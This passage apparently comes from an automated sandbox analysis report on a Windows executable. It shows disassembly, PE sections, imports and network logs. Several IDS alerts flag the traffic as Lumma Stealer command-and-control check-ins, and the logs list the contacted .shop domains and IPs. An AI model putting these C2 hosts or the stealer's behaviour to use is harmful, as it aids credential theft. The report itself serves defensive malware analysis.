                                                                                                                                                                imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                                                                                                and dl, byte ptr [ecx+57h]
                                                                                                                                                                insb
                                                                                                                                                                imul esi, dword ptr [eax+ebx*2], 7745346Eh
                                                                                                                                                                dec ecx
                                                                                                                                                                jno 00007F9C912752ECh
                                                                                                                                                                push esp
                                                                                                                                                                push 6B767654h
                                                                                                                                                                push 3452352Fh
                                                                                                                                                                pop ecx
                                                                                                                                                                xor dword ptr [eax+49h], ebp
                                                                                                                                                                dec edi
                                                                                                                                                                xor dword ptr [ecx+35h], edx
                                                                                                                                                                jnc 00007F9C912752C6h
                                                                                                                                                                jp 00007F9C912752E3h
                                                                                                                                                                jo 00007F9C912752DAh
                                                                                                                                                                dec eax
                                                                                                                                                                jnc 00007F9C912752DCh
                                                                                                                                                                das
                                                                                                                                                                cmp dword ptr [ecx+41h], esi
                                                                                                                                                                je 00007F9C912752D4h
                                                                                                                                                                jp 00007F9C912752E5h
                                                                                                                                                                push eax
                                                                                                                                                                je 00007F9C912752F3h
                                                                                                                                                                jo 00007F9C912752B8h
                                                                                                                                                                imul esi, dword ptr [ecx], 00000000h

                                                                                                                                                                Data Directories

                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xcef0000x4e.edata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xcf00000x1438.idata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xcf40000x33f2f.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0xc810000x1aa54.pdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0xced4000x28f8
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xd280000x1d8b4.reloc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xc7f2e00x28.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xcf048c0x450.idata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                Sections

                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000x53e4a00x53e600394db365a9f376f5c9b299a89ab25a15unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x5400000x566b00x568001b5e5b16986ac232a6a53b48fcef5344False0.34253635296242774dBase III DBT, version number 0, next free block index 10, 1st item "6kDSMZOvjsQ+0="4.645704544292621IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rdata0x5970000x6e91300x6e920021aaeaf462336b9dda8d6b9047ad89aeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .pdata0xc810000x1aa540x1ac00d2b0dbe0d7214d404412ddbeb569c811False0.40415997371495327data5.637791091275255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .xdata0xc9c0000xc600xe001968239f00fc167752b363921b6f7862False0.2603236607142857data4.006709114879526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .bss0xc9d0000x514600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .edata0xcef0000x4e0x200eda511bdddf784c55171ae58ef7651e0False0.1328125data0.8426867641107897IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                .idata0xcf00000x14380x16004ec2e06f21480c761e0837d644ba2871False0.2956321022727273data4.187655253188815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .CRT0xcf20000x700x200e5fdc731709deadaef06b908907d36c5False0.083984375data0.4565349337112152IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .tls0xcf30000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rsrc0xcf40000x33f2f0x340001867f5914e50b43c6feb6ebe36589329False0.11912184495192307data4.062097483566672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .reloc0xd280000x1d8b40x1da00b5504400ca42ae08420f2866c869a5dfFalse0.22093387394514769data5.445753000800914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_ICON0xcf41680x3334cDevice independent bitmap graphic, 225 x 450 x 32, image size 2025000.11429388767044912
                                                                                                                                                                RT_GROUP_ICON0xd274b40x14data1.2
                                                                                                                                                                RT_VERSION0xd274c80x340dataEnglishUnited States0.4230769230769231
                                                                                                                                                                RT_MANIFEST0xd278080x727XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4265428727471327

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                KERNEL32.dllAddAtomA, AddVectoredContinueHandler, AddVectoredExceptionHandler, CloseHandle, CreateEventA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreA, CreateThread, CreateWaitableTimerExW, DeleteAtom, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, FormatMessageA, FreeEnvironmentStringsW, GetAtomNameA, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetEnvironmentStringsW, GetErrorMode, GetHandleInformation, GetLastError, GetProcAddress, GetProcessAffinityMask, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LoadLibraryW, LocalFree, MultiByteToWideChar, OpenProcess, OutputDebugStringA, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseException, RaiseFailFastException, ReleaseMutex, ReleaseSemaphore, RemoveVectoredExceptionHandler, ResetEvent, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetErrorMode, SetEvent, SetLastError, SetProcessAffinityMask, SetProcessPriorityBoost, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                                                                                                                                                msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _lock, _memccpy, _onexit, _setjmp, _strdup, _ultoa, _unlock, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, longjmp, malloc, memcpy, memmove, memset, printf, realloc, signal, strerror, strlen, strncmp, vfprintf, wcslen

                                                                                                                                                                Exports

                                                                                                                                                                NameOrdinalAddress
                                                                                                                                                                _cgo_dummy_export10x140ced690

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-10-02T14:55:29.335432+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849716172.67.188.210443TCP
                                                                                                                                                                2024-10-02T14:55:29.335432+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849716172.67.188.210443TCP
                                                                                                                                                                2024-10-02T14:55:29.359107+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.8576931.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:29.371418+02002056162ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)1192.168.2.8493641.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:29.383142+02002056160ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)1192.168.2.8597591.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:29.464436+02002056158ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)1192.168.2.8596231.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:29.551416+02002056156ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)1192.168.2.8603531.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:29.563128+02002056154ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)1192.168.2.8541801.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:29.573766+02002056152ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)1192.168.2.8638061.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:29.584440+02002056150ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)1192.168.2.8644981.1.1.153UDP
                                                                                                                                                                2024-10-02T14:55:32.267885+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849718172.67.209.193443TCP
                                                                                                                                                                2024-10-02T14:55:32.267885+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849718172.67.209.193443TCP

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Oct 2, 2024 14:55:28.190203905 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.190253019 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:28.190323114 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.193065882 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.193083048 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:28.663266897 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:28.663358927 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.718578100 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.718607903 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:28.718962908 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:28.759210110 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.875998974 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.876028061 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:28.876311064 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.335443020 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.335685015 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.335892916 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:29.336931944 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:29.336951017 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.336963892 CEST49716443192.168.2.8172.67.188.210
                                                                                                                                                                Oct 2, 2024 14:55:29.336970091 CEST44349716172.67.188.210192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.603353024 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:29.603404999 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.603475094 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:29.603775024 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:29.603782892 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.249186993 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.249279976 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.250813961 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.250823021 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.251056910 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.252469063 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.299406052 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.796559095 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.796581984 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.796596050 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.796633959 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.796663046 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.796679974 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.796705008 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.900701046 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.900719881 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.900820971 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.900861025 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.901596069 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.906116009 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.906168938 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.906198978 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.906217098 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.906256914 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.906390905 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.906408072 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.906433105 CEST49717443192.168.2.8104.102.49.254
                                                                                                                                                                Oct 2, 2024 14:55:30.906439066 CEST44349717104.102.49.254192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.931730032 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:30.931761980 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.931837082 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:30.932135105 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:30.932147026 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.799834967 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.799985886 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.801623106 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.801637888 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.802052975 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:31.803328037 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.803368092 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:31.803409100 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:32.267947912 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:32.268125057 CEST44349718172.67.209.193192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:32.268181086 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:32.268420935 CEST49718443192.168.2.8172.67.209.193
                                                                                                                                                                Oct 2, 2024 14:55:32.268440008 CEST44349718172.67.209.193192.168.2.8

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Oct 2, 2024 14:55:28.171967030 CEST5951253192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:28.185643911 CEST53595121.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.359107018 CEST5769353192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.368637085 CEST53576931.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.371417999 CEST4936453192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.380625963 CEST53493641.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.383141994 CEST5975953192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.461071014 CEST53597591.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.464436054 CEST5962353192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.547616959 CEST53596231.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.551415920 CEST6035353192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.560189009 CEST53603531.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.563127995 CEST5418053192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.572525978 CEST53541801.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.573765993 CEST6380653192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.582690001 CEST53638061.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.584439993 CEST6449853192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.593302965 CEST53644981.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:29.596159935 CEST6082853192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:29.602756023 CEST53608281.1.1.1192.168.2.8
                                                                                                                                                                Oct 2, 2024 14:55:30.920080900 CEST6545653192.168.2.81.1.1.1
                                                                                                                                                                Oct 2, 2024 14:55:30.930160999 CEST53654561.1.1.1192.168.2.8

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Oct 2, 2024 14:55:28.171967030 CEST192.168.2.81.1.1.10xefdcStandard query (0)dividenntykw.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.359107018 CEST192.168.2.81.1.1.10xe18bStandard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.371417999 CEST192.168.2.81.1.1.10xe3aeStandard query (0)ghostreedmnu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.383141994 CEST192.168.2.81.1.1.10x129dStandard query (0)offensivedzvju.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.464436054 CEST192.168.2.81.1.1.10xf474Standard query (0)vozmeatillu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.551415920 CEST192.168.2.81.1.1.10x92a6Standard query (0)drawzhotdog.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.563127995 CEST192.168.2.81.1.1.10x542bStandard query (0)fragnantbui.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.573765993 CEST192.168.2.81.1.1.10x45d4Standard query (0)stogeneratmns.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.584439993 CEST192.168.2.81.1.1.10xfb48Standard query (0)reinforcenh.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.596159935 CEST192.168.2.81.1.1.10x3e2bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:30.920080900 CEST192.168.2.81.1.1.10x3f47Standard query (0)gravvitywio.storeA (IP address)IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Oct 2, 2024 14:55:28.185643911 CEST1.1.1.1192.168.2.80xefdcNo error (0)dividenntykw.shop172.67.188.210A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:28.185643911 CEST1.1.1.1192.168.2.80xefdcNo error (0)dividenntykw.shop104.21.8.235A (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.368637085 CEST1.1.1.1192.168.2.80xe18bName error (3)gutterydhowi.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                Oct 2, 2024 14:55:29.380625963 CEST1.1.1.1192.168.2.80xe3aeName error (3)ghostreedmnu.shopnonenoneA (IP address)IN (0x0001)false
